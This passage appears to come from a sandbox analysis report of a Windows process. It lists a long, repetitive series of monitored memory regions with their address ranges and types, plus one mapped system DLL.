2579 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2580 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2581 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2583 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2584 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2585 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2586 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2587 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2588 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2589 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2590 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2591 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2592 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2593 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2594 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2595 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2596 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2597 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2598 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2599 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2600 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2601 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2602 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2603 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2604 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2605 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2606 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2607 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2608 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2609 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2610 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2611 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2612 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2613 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2614 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2615 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2616 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2617 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2618 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2619 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2620 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2621 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2622 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2623 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2624 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2625 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2626 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2627 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2628 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2629 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2630 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2631 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2632 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2633 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2634 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2635 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2636 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2637 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2638 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2639 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2640 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2641 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2642 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2643 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2644 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2645 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2646 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2647 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2648 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2649 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2650 start_va = 0x3ed0000 end_va = 0x3edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 2651 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 2652 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2653 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 2654 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 2655 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2656 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2659 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2660 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2663 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2664 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2667 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2668 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2672 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2673 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2676 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2677 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2680 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2681 start_va = 0x49d0000 end_va = 0x49ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 2682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2684 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2685 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2688 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2689 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2692 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2693 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2696 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2697 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2700 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2701 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2704 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2705 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2708 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2709 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2712 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2713 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2716 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2717 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2720 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2721 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2724 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2725 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2728 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2729 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2732 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2733 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2750 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2751 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2757 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2758 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2776 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2777 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2782 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2783 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2788 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2789 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2796 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2797 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2806 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2807 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2813 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2814 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2822 start_va = 0x7ffa0a3e0000 end_va = 0x7ffa0a482fff monitored = 0 entry_point = 0x7ffa0a3f4810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 2823 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2824 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 